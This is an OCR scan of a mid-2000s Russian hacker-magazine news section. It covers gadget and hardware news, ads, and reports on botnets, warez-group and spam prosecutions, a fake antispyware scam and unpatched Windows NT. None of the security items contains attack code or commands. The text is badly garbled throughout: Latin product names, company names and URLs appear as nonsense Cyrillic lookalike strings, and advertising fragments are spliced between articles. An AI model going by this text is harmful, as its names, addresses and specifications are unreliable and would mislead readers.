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То что ты видишь сейчас, 
это что-то вроде наступ- 
ление новой эры в нашем 
журнале. Мы сделали се- 
бе новый дизайн, новый 
стиль. Теперь у нас будет 
такое лицо. И это то, как 
мы чувствуем журнал Ха- 
кер. И эти ощущения хо- 
тим передать тебе. Наде- 
юсь, что тебе придется 
по душе такой дизайн, 
потому что мы сами до 
сих радуемся его прек- 
расности :). 



Мы отошли от различных 
сложных элементов в ди- 
зайне, которые нагружа- 
ет верстку и в придачу 
твой мозг. Сделали ди- 
зайн максимально сво- 
бодным и легким. Плюс 
добавили немного доро- 
говизны и пафоса. Чтобы 
тебе было приятнее поку- 
пать наш журнал :). 

Но не стоит пугаться, что у 
нас у всех поехала крыша 
и в связи с этим мы станем 
писать какие-нибудь дру- 



гие статьи, которые тебе 
вообще не нужны. Нет. Ни- 
китос. Бублик, Горлум и 
другие редакторы продол- 
жают отчаянно доить своих 
авторов для получения ин- 
тересных статей. Так что 
журнал, в плане контента 
хуже не станет. 

Вот, в общем-то, и все. Пе- 
релистывай быстрее стра- 
ницы и смотри, что же у нас 
получилось... 
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НІТЕСНЫЕѴѴЗ ▼ 



ГОРИ, ГОРИ ЯСНО! 

Энтузиасты с сайта и/и /ѵѵ.зоІагсІесіТІігсіу.сот в домашних усло- 
виях сконструировали мощное лучевое оружие, плавящее все 
на своем пути. Идею подсказала легенда о зеркалах Архиме- 
да, обративших в пепел корабли римлян. Зоіаг Эеаііп Рау сос- 
тоит из 112 квадратных зеркалец, закрепленных на платформе 
шириной 1,5 и высотой 2,5 м. Конструкция позволяет менять 
угол наклона платформы и двигать ее на колесах. Все зерка- 
ла фокусируют солнечный свет в одной точке на расстоянии 
2 м от платформы. 

Там и располагает- 
ся «жертвенный ал- 
тарь». Под воздей- 
ствием солнечных 
лучей объект начи- 
нает быстро нагре- 
ваться, пока не дос- 
тигнет равновесной 
температуры, при 
которой интенсив- 
ность падающего и 
испускаемого излу- 
чения равна. Еще 
немного, и цель вспы- 
хивает синим пламе- 
нем. По расчетам 
Зоіаг Эеаііп Рау наг- 
ревает объекты до 
500-600 градусов 
Цельсия. Для срав- 
нения, бумага заго- 
рается примерно при 230 градусах. Свои дерзкие экспери- 
менты создатели агрегата начали с обычной свечки. Они уже 
поджарили пятидюймовую дискету, расплавили резинового 
утенка, мячик для гольфа, армию оловянных солдатиков, 
собственные штаны и робособаку. В поисках очередной жерт- 
вы на сайте объявлен конкурс. Предпочтение отдается объек- 
там, имеющим темную окраску. 




НІШАИ Ѵ5. НОВОТ 

В первом международном со- 
ревновании по армрестлингу 
между роботом и представи- 
тельницей прекрасной полови- 
ны человечества 17-летняя де- 
вушка не оставила жестянке 
шансов на победу. Всего 24 се- 
кунды потребовалось худень- 
кой Пэнне Фелсен, чтобы зава- 
лить первого соперника-робо- 
та. Набравшись смелости, она одной левой уложила еще двоих с 
интервалом в 3 секунды. Необычное состязание организовала 
Лаборатория реактивного движения НАСА. Здесь разрабатыва- 
ют электроактивные полимеры — особый тип пластика, который 
расширяется и сжимается под воздействием электрического за- 
ряда. Научные разработки должны лечь в основу искусственных 
роботизированных мышц. Начало соревнованию века положено. 
Матч-реванш состоится уже в следующем году. 




НЕМ ДЫШИТ 
КИБЕРПАНК? 

Немецкий дизайнер Хармут Стоктер (и/ѵѵил/тзГосКГег.с/е) предста- 
вил концептуальное устройство из мира будущего. РІапі Васкраск 
— мобильная теплица с лямками для ношения на спине. Под стек- 
лом располагается настоящая зеленая оранжерея. Растения 
производят кислород, которым через кислородную маску и дышит 
счастливый обладатель устройства. И хотя все это не больше чем 
просто концепт, агрегат символизирует торжество симбиоза че- 
ловека и природы. Настоящему киберпанку загрязненный воздух 
урбанизированной цивилизации будущего не страшен. 



ВИРТУАЛЬНЫЙ 

ТРУП 

Канадская компания ІѴЮ РоЬоІісз (и/и/и /.тсІгоЬоТісз.ссі) предста- 
вила систему для трехмерного моделирования места преступле- 
ния. Оперативная съемка производится с использованием сте- 
рео-камеры, состоящей из двух обычных камер. В дальнейшем 
все присутствующие в зале суда могут в деталях изучить место 
преступления, взглянуть на него в различном приближении, с раз- 
ных сторон и под разными углами, а также точно измерить рассто- 
яние между объектами. Тебе интересно будет узнать, что схожие 
алгоритмы использует для ориентирования в пространстве и поис- 
ка «апорта» робособака АіЬо — прямо комиссар Рекс какой-то. 
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Геймеры из Штатов завязывают играть на пустой желудок. С недав- 
них пор в многопользовательской РПГ ЕѵегОиезі II можно заказать 
пиццу, не выходя из игры. Достаточно набрать в консоли /рітіа, что- 
бы появилось окно заказов компании Ріиа Ниі. Вводим адрес дос- 
тавки, и можно возвращаться к игре. Курьер прибудет в течение 45 
минут. Понимая всю важность происходящего, он поможет распа- 
ковать пиццу и не возьмет чаевых. Стоимость сытной горячей ле- 
пешки будет включена в ежемесячный счет за игру. 






Товар сертифицирован. 
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ОЕГЕЫОЕН 
ПОДДЕРЖИВАЕТ 
ОПТИКУ 

Довольно известная на российском рынке компания йе^епсіег, за- 
нимающаяся производством мышей, клавиатур и других компью- 
терных аксессуаров, начала новую маркетинговую программу, в 
рамках которой будут установлены предельно низкие розничные 
цены на оптические мыши. Так, например, трехкнопочные модели 
йеіюпсіег Е 3530 и ЭеТепсІег Е 2330 обойдутся всего в 145 рублей, а 
эргономичные пятикнопочные мыши йеіюпсіег М 1330 и Оеіепдег 
М 1330 — в 195 рублей. Все покупатели пятикнопочных мышей М 
1300 и М 1330 смогут принять участие в розыгрыше ноутбука. 

По словам представителей Оеіепбег, эта акция направлена на 
окончательный переход офисных и домашних пользователей с 
шариковых на оптические мыши. 
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„ ПОЮЩАЯ ЩЕТКА 

О Дело капитана Врунгеля живет и побеждает. Компания НазЬго 
представила музыкальную зубную щетку ТооіБ Типез со встроен- 
ным плеером для внутреннего уха. Двухминутная композиция хра- 
нится на крошечном микрочипе в ручке. Перед тем как начать чис- 
тить зубы, нужно нажать на кнопку. Затем можно приставлять щет- 
ку к зубам и начинать елозить. Миникомпьютер воспроизводит ме- 
лодию. Через преобразователь звуковые волны поступают на пе- 
редние зубы, далее на челюстную кость и на внутреннее ухо. Ок- 
ружающие ничего не слышат. Длительность композиции выбрана 
не случайно — именно столько стоматологи рекомендуют чистить 
зубы. Сейчас НазЬго заключает договора с известными исполни- 
телями, после чего поющая щетка поступит в продажу. 



КРУТИ ПЕДАЛИ 

Японские велосипедисты взяли на вооружение гэджет для подзаряд- 
ки мобильных устройств. Рооі Ро\л/ег 505І представляет собой неболь- 
шую динамо-машину, вырабаты- 
вающую заряд для питания мо- 
бильника, МРЗ-плеера или кар- 
манного компьютера. Агрегат 
крепится на раме у колеса, к ко- 
торому и прижимается элемент, 
обеспечивающий подзарядку 
при вращении. В комплект входит 
несколько муфт, клипса для креп- 
ления мобильника на руле и под- 
робные инструкции по сборке. 




НЕРВНАЯ КУРТКА 

Британский дизайнер-модельер Фил Вортингтон (и/ѵѵи/.и /огіііегзо- 
гідіпаі.сот ) представил прототип куртки, сигнализирующей о 
раздражительности своего хозяина. На рукавах и спине пришиты 
меховые полоски. Под воздействием электрического заряда 
ворсинки на них электризуются и приподнимаются, как иголки у 
дикобраза. Еще немного, и шерсть встает дыбом. Если хозяин 
конкретно нервничает, на концах ворсинок возникают разряды — 
одежда начинает искриться и потрескивать. Над третьей стадией 
бешенства дизайнер только размышляет. Скорее всего, куртка 
будет бить током всех, кто осмелится прикоснуться к меховому 

загривку. Сейчас поведением 
куртки управляет человек — во 
внутреннем кармане спрятан 
тумблер и аккумулятор. В даль- 
нейшем в одежду может быть 
встроен датчик электрическо- 
го напряжения. 
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ХАЙ-ТЕК УРНА 

Американская компания ЗеаБогзе Ро\л/ег (и/и /ѵѵ.зеоііогзе- 
роѵѵег.сот ) представила высокотехнологичный мусорный 
контейнер на солнечных батареях. ВідВеІІу не просто собира- 
ет утиль, но утрамбовывает его по ме- 
ре заполнения урны. Поэтому умный 
контейнер вмещает в восемь раз 
больше мусора. По расходу энергии 
включение пресса сравнимо с 15 се- 
кундами работы фена. Когда контей- 
нер заполняется под завязку, опти- 
ческий сенсор вызывает мусоровоз. 

Правда, дизайнеры немного пере- 
мудрили с конструкцией. Умную урну 
частенько путают с почтовым ящиком, 
а некоторые прохожие и вовсе не по- 
нимают, что это такое. 




ХАКЕРЫ 

НАСТУПАЮТ 

Участники проекта Нопеупеі 
постоянно радуют зесигііу- 
комьюнити своими исследова- 
ниями. Недавно они провели 
новый эксперимент, но на этот 
раз радоваться нечему. Как вы- 
явили эксперты, более миллио- 
на компьютеров в Сети являют- 
ся зомби и используются хаке- 
рами для осуществления их ко- 
варных замыслов. Хонинетовцы выделили несколько компьюте- 
ров, которые были подключены к Сети и тщательно мониторили 
все действия взломщиков. Первый такой комп был заражен уже 
через 10 секунд, а писюк, который продержался дольше осталь- 
ных, присоединился к зомбированным собратьям через несколь- 
ко минут. Для внедрения своих троянов на компы юзеров хакеры 
используют кучу уязвимостей в винде и сопутствующих прогах, 
после чего компьютер-зомби приступает к поиску других компов, 
чтобы заразить и их. Таких образом злые гении оперируют огром- 
ными сетями (десятки тысяч машин), с помощью которых можно 
при желании задосить любой сайт. Основной целью создания по- 
добных сетей является рассылка спама, которая приносит хаке- 
рам неплохой доход. Иногда, впрочем, организуются массиро- 
ванные атаки на неугодные сайты (например, борящиеся со спа- 
мом) или заказанные клиентом. Во время исследования с компью- 
теров Нопеупеі производилась попытка вывести из строя Ѳоодіе 
Асізепзе, контролирующий баннеры гугла на разных пагах. Также 
объектами атак нередко становились онлайновые игры и чарты. 
Но больше всего, по мнению команды Нопеупеі, стоит опасаться 
возможности использования сетей из компов-зомби для получе- 
ния конфиденциальной инфы (номеров кредиток, паролей). В пос- 
леднее время такие случаи участились, и уже необязательно что- 
то запускать, чтобы твои данные уплыли на сторону. Достаточно 
просто подключиться к интернету. 




СУД НАД 
ОПІЫК ОН ОІЕ 



Эгіпк ог Эіе в андег- 
раунде считается 
одной из старейших 
и крупнейших варез- 
ных групп, занимаю- 
щейся активной дея- 
тельностью с нача- 
ла 90-х. Долгое вре- 
мя органы безус- 
пешно пытались 
поймать ее членов, 
и только в 2001 году 
удалось арестовать 
восьмерых мембе- 
ров из Великобритании. В некоторых своих проступках парни соз- 
нались, но полиция посчитала, что на самом деле ЭоЭ натворила 
намного больше бед. По подсчетам таможенных органов ущерб от 
ее деятельности оценивается в миллиарды долларов. Ведь значи- 
тельная часть всего пиратского софта, гуляющего по Сети, — зас- 
луга именно Оппк ог Оіе. С момента первого ареста шло долгое 
расследование, в результате которого арестовали еще 60 прича- 
стных к группе человек. ОоО была разделена на четыре отделения: 
поставщики, взломщики, тестеры и упаковщики. Все вместе они 
представляли отлаженный механизм по взлому и распростране- 
нию пиратского ПО. В мае закончится слушание по делу двух клю- 
чевых фигур ОоО: 32-летнего Алекса Белла и 42-летнего Стива Дау- 
да. Стив был координатором поставок, а Алекс, помимо всего 
прочего, работал в ІТ-отделе крупного банка и снабжал группу 
свежими номерами кредиток. Судя по всему, крупным штрафом, 
как некоторые члены группы, эти двое не отделаются. 
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НОВЫЕ 

80НУЕВІС880Ы 

Недавно ЗопуЕгісззоп представила сразу 
несколько новых телефонов: оснащенный 
двухмегапиксельной камерой К750І муль- 
тимедийный ѴѴ800І, а также две трубки на- 
чального уровня: КЗООі и 4300І. 

К750І является развитием прошлогодней 
модели 3700. Новинка оборудована 2 Мп 
камерой с четырехкратным цифровым зу- 
мом, обладает 32 Мб встроенной памяти 
и возможностью использовать карты па- 
мяти Метогу Зііск Эио (вместе с аппара- 
том поставляется карта емкостью 64 Мб). 
Также телефон поддерживает ЗЭ Заѵа, 
имеет интерфейсы ВІиеГооГГі/ІГЮА, встро- 
енный МРЗ-проигрыватель и ЕМ-радиоп- 
риемник. Размеры новинки составляют 
100x46x20,5 мм, разрешение дисплея — 176x220, поддержива- 
ется 262144 цветовых оттенка. 

По ожиданиям аналитиков, этот трехдиапазонный (03М 
900/1800/1900 МГц) аппарат начнут поставлять на рынок во вто- 
ром квартале 2005 года. 

Что касается ѴѴ800І, буква «ѴѴ» здесь присутствует не просто так: 
очевидно, она пришла от слова «\л/аІктап». И в самом деле, теле- 
фон вполне можно использовать в качестве плеера: по заявлени- 
ям производителя, пользователи смогут легко наслаждаться 
тридцатью часами непрерывной музыки. 

К ѵ\ Л 300 — телефоны подешевле, но все равно очень прият- 
ные. Мне понравился дизайн новинок, да и с внутренностями у 
них все отлично. Поддержка Заѵа в бюджетных телефонах — 
это впечатляет :). 



ГАД 

МЕХАНИЧЕСКИЙ 

Инженеры американского Университета штата Мичиган 
(ѵѵѵѵѵѵ. итісіі. есіи) сконструировали робота-змею. Туловище 
ОтпіТгеасІ ОТ-4 составлено из пяти покрытых гусеницами сегментов 
по 20 см в диаметре каждый. Робот весит более 10 кг и управляется 
оператором дистан- 
ционно с джойстика. 

Механический гад 
обладает уникаль- 
нейшей маневрен- 
ностью. Он двигает- 
ся по пересечен- 
ной местности, с 
легкостью взбира- 
ется на лестницы и 
трубопроводы. Если 
препятствие велико- 
вато, робот поднима- 
ет голову или хвост и 
мощным движением 
искусственных мышц 
бросается вперед. 

Через ямы и расще- 
лины робот перема- 
хивает одним рывком. 

Назначение гада — 
вести поиски людей 
на завалах и выпол- 
нять ответственные 
военные разведыва- 
тельные задания. 
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Сообщения 





Изображения 



Смартфон Иокіа 7710. Открывайте. Создавайте. Делитесь. 

Новый мультимедийный смартфон ІМокіа 7710 позволит Вам всегда оставаться в курсе дел и наслаждаться 
возможностями мультимедиа в пути. Высокоскоростное соединение идеально для работы с веб-браузером, 
электронным дневником, а также для просмотра потокового видео и скачивания музыкальных файлов. 
Удобная навигация на широком сенсорном экране и отличное качество изображения. 

Память на 800 фотографий, 4 часа музьжи или 5 часов видео. 



• Сенсорный экран 640x320 пикселей 

• До 90 Мб свободной внутренней памяти 

+ 128 Мб на мультимедийной карте памяти 

• Камера с мегапиксельным разрешением 



• НТМПбраузер 

• Поддержка Е-таіІ и мультимедийных сообщений 

• Стерео МРЗ-плейер и РМ-радио 

• РІМ: контакты, календарь и список дел 



ѵѵѵѵѵѵ.покіа.сот/ѵѵісІеБСгееп Горячая линия Ыокіа: (095) 727-2222. Часы работы: 08.00-20.00 (московское время), Пн.-Пт. 
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УКРАИНСКОМУ 
СПАМЕРУ ГРОЗИТ 
НЕБО В КЛЕТОЧКУ 

Ты наверняка не в 
курсе, поэтому со- 
общаю: на Украи- 
не в УК внесли до- 
полнения, в кото- 
рых сказано, что за 
нарушение работы 
РС путем рассылки 
спама предусмот- 
рена уголовная от- 
ветственность. Да и 
вообще, по словам 
нового президен- 
та, в скором вре- 
мени всем хаке- 
рам, кардерам, 
спамерам и иже с 
ними грозит тоталь- 
ное истребление. 
Но это в скором будущем, а пока случаи задержания «компьютер- 
ных преступников» единичны. Одним из таких случаев стал недав- 
ний арест одного донецкого спамера, который своими рассылка- 
ми настолько достал местного провайдера, что тот обратился в 
милицию. Органы оказались матерые и быстро установили, кто за 
всем этим стоит. Сейчас горе-спамер сидит под распиской о не- 
выезде и ждет начала суда. Если его признают виновным — это или 
штраф от 500 до 1000 украинских минимумов (около $85), или от- 
сидка до трех лет. Не знаю как ты, а я жалости к спамерью не ис- 
пытываю, даже если ему впаяют по полной. За прошлую неделю из 
рабочего ящика я выгреб почти 150 левых писем. И каждое из них 
стоило мне трафика, отнюдь не халявного. Так что давайте, дяди в 
погонах, засадите его глубоко и надолго. Может, остальным пос- 
лужит уроком. 




ПОЛГОДА ЗА 
ТЕЛЕФОННУЮ ШУТКУ 

Прошедший ме- 
сяц особенно 
урожайный на 

^нъпян іі с у дь| и °Р есты - 

Еще один обви- 
въ л { нительный при- 

| говор по около- 
компьютерному 
преступлению 
был вынесен на 
окружном суде 
штата Луизиана. 
27 тысяч долла- 
ров штрафа и 

полгода тюрьмы — такое наказание получил 41 -летний амери- 
канец Дэвид Джинсон, который занимался рассылкой писем 
со странным атачем пользователям сервиса МЗЫ ТѴ. В своих 
мессагах Дэйв заверял, что прикрепленный файл оптимизиру- 
ет цветовые настройки, в то время как простенький скрипт ме- 
нял телефон прозвона на номер службы спасения 911. В ре- 
зультате этой «шутки» ко многим пользователям наведывалась 
полиция, интересуясь странными звонками. Обвинителем выс- 
тупила вездесущая корпорация Місгозоіі, которой и будут 
выплачены штрафные денежки. Неясно, как бы обернулось 
дело, если бы Джинсон не признал себя виновным в создании 
угрозы общественной безопасности и причинении вреда. Из- 
лишняя болтливость будет стоить ему полгода жизни в одной 
из луизианских тюрем. 




КАМЕРЫ ПІСОН 

В линейке цифровиков РісоП пополнение: свет увидела пятимега- 
пиксельная камера Сарііо Р2. По своему внешнему виду новинка, 
размеры которой составляют 100,2x25,8x55 мм, весьма схожа с 
Міпох йС 5222. Однако думается, что это просто совпадение :). 
Среди функций камеры можно выделить 4,8-кратный оптический 
и 3,6-кратный цифровой зум, а также продвинутый макрорежим: 
минимальная дистанция съемки составляет всего 1 см. Фокусное 
расстояние в 35-миллиметро- 
вом эквиваленте варьируется от 
28 до 135 мм, а задержка сра- 
батывания затвора составляет 
0,06 с. Новинка также оборудо- 
вана классным 2,5-дюймовым 
ЖК-дисплеем. 




КРЕАТИВНАЯ 
ТОЧКА ЗРЕНИЯ 




Думаю, тебе знакомо название Роіпі оі 
Ѵіе\л/ ѲгарНісз. Если же нет, то знай: эта 
компания знаменательна тем, что вы- 
пускает качественные видеокарты на 
базе чипов от ІМѴЮІА. Недавно вот 
представила новую видюшку, отличи- 
тельной особенностью которой стал вы- 
сококлассный кулер Ісе СПатеІеоп со сниженным уровнем 
шума. Массивный радиатор целиком выполнен из меди и обо- 
рудован малооборотистым вентилятором, который и в самом 
деле шумит на порядок тише обычного. Тут дело в том, что при 
использовании в графических станциях двух видеокарт в режи- 
ме МиІіі-ѲРІІ проблема шума становится особенно остро: 
восприимчивые и ранимые дизайнеры начинают нервничать, и 
у них пропадает вдохновение. Поэтому инженерам, трудящим- 
ся над системами охлаждения современных видеосистем, 
приходится бороться за каждый децибел. 

Новые видеокарты основаны на микросхемах серий ѲеЕогсе 
6600 и ѲеЕогсе 6800, поддерживают технологию 5І_І и используют 
интерфейс РСІ Ехргезз хіб. Эти новинки были представлены на 
выставке СеВІТ и уже поступили в продажу. 



МОНИТОРЫ ІІѴАМА 

Небезызвестная фирма Ііуата выпустила три новые модели ЖК- 
мониторов: 19-дюймовый РгоПіе Е4813-3 с цифровым и аналоговым 
входами, 17-дюймовый РгоПіе Е4315-3, также с двумя входами, и 
РгоПіе Е4303-3 с одним лишь аналоговым (ѴѲА) входом. Все 
представленные модели обладают временем отклика 8 мс, что 
уже перестало быть диковинкой (более того, недавно ВепѲ и 
Ѵіе\л/5опіс анонсировали ЖК-дисплеи с временем отклика 4 мс). 




Ориентировочная стоимость 
новинок составит около 500, 330 
и 320 долларов соответственно. 
Как 19-дюймовые, таки 17-дюй- 
мовые модели поддерживают 
разрешение до 1280x1024 
(5ХѲА), контрастность состав- 
ляет 700:1, а яркость — 300 
Кд/м 2 . Угол обзора по вертика- 
ли и горизонтали составляет, 
соответственно, 135 и 150 гра- 
дусов. В мониторы встроены 
стереоколонки мощностью по 
2 Вт. Размеры 19-дюймовых мо- 
делей составляют 418x197x412 
мм, вес — 5,5 кг; 17-дюймовых 
моделей — 369x379x189 мм, 
вес — 4,1 кг. 
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Чипсет пѴЮІА ИР4 ІІКга; 

БоскеИ 939 для АМЭ АіЫоп™ 64/64РХ СРІІ, 

Р5В 2000 МТ/5, НурегТгапзроП™; 

до 4СВ Оиаі сЬаппеІ 0РР400/00РЗЗЗ/00Р266; 

1 х РСІе XI 6, 2 х РСІе XI , 4 х РСІ; 

4х5егіаІ АТАМ (КАЮ 0, 1, 0+1); 

Аисііо 7.1, АС97; ОЬЕ І_АЫ, ІЕЕЕ 1394а; 
до 8 портов 115В 2.0; 
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Собственное производство высококачественной стали • Лицевые панели изготовлены в соответствии со стандартами ведущих мировых производителей 
Легендарные блоки питания Р5Р, НіРго, 150 • Сборка ПК без использования инструмента во всех моделях корпусов 
Дополнительные вентиляторы и 115В панели в базовой конфигурации • Более 100 моделей во всех ценовых категориях 
Широкий ассортимент вентиляторов для процессоров АМР и Іпіеі 



Москва: РгопеСдгоир - (095) 789-3846; ІІІІга Сотриіегз - (095) 775-7566; Инкотрейд - (095) 785-8659; Кит - (095) 777-6655; Компьютадор - (095) 274-7300; Полярис - (095) 755-5557; Альметьевск: Компьютерный мир - (8553) 25-38-29; 
Волгоград: ЮКК МТ - (8442) 49-19-20; Краснодар: Игрек - (8612) 210-98-50; Красноярск: КАПИТАЛ-СЕРВИС - (3912) 63-60-30; Курск: КомпьюЛэнд - (0712) 56-46-43; Курчатов: КомпьюЛэнд - (07131) 2-31-22; 
Липецк: Регард - (0742) 22-13-09; Набережные Челны: КЦ "Мехі сотриіег" - (8552) 39-03-38; Нижнекамск: КЦ "Ыех* сотриіег" - (8555) 43-79-82; Нижний Новгород: АйТиОн - (8312) 74-85-90; ВИСТ-НН ООО - (8312) 78-48-78; 
Ником-Медиа (8312) 34-11-34; ЮСТ - (8312) 30-16-74; Новосибирск: ЗЕТ НСК - (3832) 125-142; Омск: ТНТ ООО - (3812) 36-82-42; Электронный рай - (3812) 51-04-04; Рязянь: ІЖга - (0912) 205-205; Самара: Прагма - (8462) 16-32-87; 
Саратов: АТТО - (8452) 444-111; Томск: Стек - (3822) 554-554; Хабаровск: Диалог Плюс - (4212) 50-37-06; Дальком - (4212) - 42-86-72; Челябинск: Алиас - (3512) 37-8717; Чита: Вавилон: - (3022) 32-55-00. 
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ВОСЬМИПРОЦЕС- 
СОРНЫЙ МОНСТР 

На выставке СеВІТ, 
прошедшей недавно 
в Ганновере, компа- 
ния ТУЛЫ СотриГег 
выставила на обоз- 
рение мастодон- 
тскую восьмипро- 
цессорную систе- 
му ТгапзрогГ ѴХ50, 
которая функцио- 
нирует на камнях 
ОрГегоп 8хх. На са- 
мом деле не такая 
уж и тривиальная 
задача - разместить восемь камней на одной системной плате, 
ведь при этом нужно соблюдать стандарты, чтобы мама поме- 
щалась в корпус. Инженерам ТѴАІЧ СотриГег это удалось, и они 
создали довольно компактную систему. При этом используется 
двухъярусная компоновка, на первом «этаже» которой находит- 
ся материнская плата ТГіипбег К80ѴѴ с четырьмя гнездами ЗоскеГ 
940. Материнка использует набор логики пРогсе РгоГеззіопаІ от 
ІЧѴЮІА, имеет РСІ-Х туннель АМО-8131. Что касается остальных 
возможностей, то они типичны для платы серверного уровня: ин- 
тегрированный видеоадаптер РАСЕ ХІ_ 8МВ, два гигабитных пор- 
та (Вгоабсот ВСМ5704), четыре порта ЗегіаІ АТА и 5СЗІ под нако- 
пители. Основное внимание привлекает второй «этаж», который 
представляет собой этакую плату расширения, оборудован- 
ную отдельным разъемом для питания и четырьмя сокетами для 
кристаллов. 

В сборе вся система позволяет наслаждаться мощью сразу 
восьми процессоров ОрГегоп 8хх и использовать в общей слож- 
ности до 128 Гб регистровой ЕСС ООРЗЗЗ/400 памяти. 

Такой «сэндвич» имеет размеры 406,4x330 мм, что позволяет раз- 
местить его в не самом большом корпусе. Разумеется, при этом 
требуется разумный подход к охлаждению системы :). 



ЧТО СТОИТ ЗА 

ПОДОЗРИТЕЛЬНОЙ 

ФРАЗОЙ? 






Ты читаешь пользовательское 
соглашение перед тем, как за- 
пустить программу? И я нет. Да 
и никто, наверное, не читает. 
Кому они нужны, соглашения 
эти, пусть их читают те, кто пи- 
шет. У АОІ_ ІпзГапГ Меззепдег 
(АІМ) тоже есть свое соглаше- 
ние. Оно было вставлено в 
программу на этапе инсталля- 
ции в феврале 2004 года, но до 
недавнего времени никакого 
интереса не вызывало. И вот 
наконец кто-то от нечего де- 
лать его прочел и нашел между 
скучных строк подозрительную 
фразу: «Пользуясь нашим про- 
дуктом, вы отказываетесь от 
всех прав на конфиденциаль- 
ность». «Ээ... не понял?» - воз- 
бужденно воскликнул юзер и 
высказал свои предположения 
о причинах этой фразы у себя в сетевом дневнике. «Мы все под 
колпаком!». Весть облетела интернет и вызвала большой ажио- 
таж. Шутка ли — АІМ — самый популярный инет-пейджер, и ко- 
личество его пользователей намного превышает количество 
тех, кто юзает аську. Что если АОІ_ мониторит весь этот трафик с 
одной ей понятной целью? Ответ компании не заставил себя 
долго ждать. Представители Атегіса Опііпе прокомментирова- 
ли это так: формулировка была выбрана неудачно, а введена 
для того, чтобы юридически обеспечить нормальную работу 
функции АІМ «РаГе-а-ВисІсІу», где юзеры оценивают вывешенные 
на аккаунте фотки. Чтобы утрясти скандал, АОІ_ пообещала в 
скором времени изменить текст соглашения. Новая версия, 
скорее всего, будет реализована на момент выхода журнала. 




ЭЛИТНЫМ РЕЗАК 

Корпорация АЗІІЗ представила 
недавно ЗАТА-резак СРѴѴ- 
5232А-Т, обеспечивающий боль- 
шую скорость передачи данных 
(до 1,5 Гб/с) и совместимость с 
драйверами АТА. В новом при- 
воде использованы такие фирменные технологии АЗІІЗ, как 
ЕІехГгаШпк, ЕІехГгаЗреесІ, ЭЭЗЗ II и САѴ. Все это обеспечивает высо- 
кое качество и надежность записи, а также позволяет уменьшить 
ее время, достигнув оптимальной скорости. 

Вот основные технические спецификации новинки: 

52Х СО-ѴѴгіІе (запись)/32Х Ре-ѴѴгіІе (перезапись)/52Х (чтение) СО- 
РОМ 

Технология САѴ (Сопзіапі Апдиіаг Ѵеіосііу) 

Технология предотвращения ошибок, связанных с недозагрузкой буфера 

РІехІгаЫпк 

Технология выбора оптимальной скорости записи ВІѳхігаЗрѳѳсІ 

Система РРЗЗ II 

Запатентованная технология АІ Аиіо ЗреесІ АсЦизІтѳпІ: 

Поддержка М!. Раіпіег 

Поддержка МЗ-РОЗ, ѴѴіпсіоѵѵз ХР/ЫТ/М Е/2000/98/983 Е 

Поддержка ОАО-РАѴѴ, ТАО, ОАО, ЗАО, МиШ-Зеззіоп, Раскеі ѴѴгііе и 

ОѵегЬигп 

Поддержка форматов: СО-ОА, СО-РОМ, СО-РОМ ХА, РГіоІо СО, МіхесІ 
Мосіе СО-РОМ, СО-І, Сй-Ехіга, СО-Техі, Ѵібео СО, ОѴСР 

и ВооіаЫе СР 

Возможность вертикальной и горизонтальной установки 

ѴѴіпсіоѵѵз ХР І_одо СегШіесІ 

Интерфейс ЗАТА 




НЕДОБРО- 
КАЧЕСТВЕННОЕ 
ШПИОНСКОЕ ПО 

Интересным образом решили 
подзаработать ребята, осно- 
вавшие компанию Зрокапе. Как 
известно, чайники очень беспо- 
коятся по поводу всяких виру- 
сов и троянов на своем компью- 
тере и для того, чтобы от них из- 
бавиться, готовы на любые глу- 
пости. Так вот, парни написали 
скрипт, который проникает че- 
рез Сеть на компьютер и запус- 
кает всплывающее окно, сооб- 
щающее о наличии виря. «Но ты не беспокойся, человек, вот по 
этой ссылке находится замечательная программа, которая из- 
бавит тебя от любых вирей». Дальше шел линк на сайт Зрокапе. 
Заплатив $29,95, юзер получал прогу под названием Зру\л/аге 
Аззаззіп и с ее помощью действительно избавлялся от назойливо- 
го всплывающего окна. Но как установила заинтересовавшаяся 
Федеральная комиссия США, никакие вири прога не лечит, а 
всплывающее окно нагло врет. Сейчас деятельность Зрокапе 
приостановлена, а ее основатели ждут суда. Юристы считают, 
что сурового приговора ждать не следует. Скорее всего, парням 
придется отдать прикарманенные деньги и выплатить небольшой 
штраф в пользу государства. 
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ѴѴІЫ ЫТ ОСТАЛАСЬ 
БЕЗЗАЩИТНОЙ 

Операционная система Ѵ\/іпсІо\л/5 І\ІТ 4.0, которая когда-то считалась 
такой защищенной, теперь является одной из самых уязвимых. Все 
дело в том, что Місгозоіі прекратила ее техпод держку и обновление, 
а патчи для І\ІТ можно получить только на платной основе. Чуть боль- 
ше месяца назад в маздаях была обнаружена критическая уязви- 
мость, позволяющая легко задосить систему. Но в то время как в дру- 
гих осях от Місгозоіі дыра была заклеена, N1 из-за отсутствия подде- 
ржки так и осталась дырявой. В интернете насчитываются сотни ты- 
сяч серваков, работающих под ѴѴіп ІЧТ 4.0. И лишь единицы из них ус- 
тановили платные патчи. Марк Мейфрет из еЕуе (интервью с ним бы- 
ло в одном из недавних номеров ][) посоветовал тем, кто еще сидит 
под этой осью, активировать проверку электронных подписей в ЗМВ, 
что обезвредит большинство атакующих утилит. Місгозоіі на негодо- 
вание поклонников эн-ти ответи- 
ла так: «\Л/іпсІо\л/5 ІЧТ Зегѵег4.0 раз- 
рабатывался до начала эры 
изощренных интернет-атак. Сис- 
тема достигла крайнего преде- 
ла устаревания архитектуры. Бу- 
дет безответственным внушать 
пользователям фальшивое 
чувство безопасности, продле- 
вая срок технического обслужи- 
вания этого продукта». И посове- 
товала переходить на более ак- 
туальную \Л/іпсІо\л/5 Зегѵег 2003. 



НОВАСТЬ МЕСИЦА . 

Вирховный суд Первамайсково раена города Колорадо в США вы- і" 
нис обвенитильный приговор тренацатилетниму жытилю штата Вин- 
косент, выхоцу из Читы Савелю Пыху. Задержанный обвенялся в том, 
шо он впарел сваиму соседу по лакалке всякие многие вещи. Он 
это нисказал соседу. Сосед (кстате, по имени Жора Мойоров), ко- 
да у нево кончелось денги на карточке, проста офигел. И тогда он 
позвонил в ЖЭК, и попросил, шоб кто-нить задиржал Савелия. И был 
послан. Тогда он позвонил в военкомат и был принят. Облом блин. 





ЛИДЕР ЫМР ВІ2КІТ 
СУДИТСЯ С ПОРНО 
САЙТАМИ 

Долгое время на 
некоторых порно- 
сайтах среди раз- 
делов «Маленькие», 
«Большие», «Белые» 
и «Черные» нахо- 
дился интригующий 
трехминутный ролик 
«Лидер Ытр Вігкіі 
показывает класс». 
В нем Фред Дерст 
перед вниматель- 
ной камерой драл 
свою подругу на ку- 
хонном столе. Ко- 
нечно, пройти мимо 
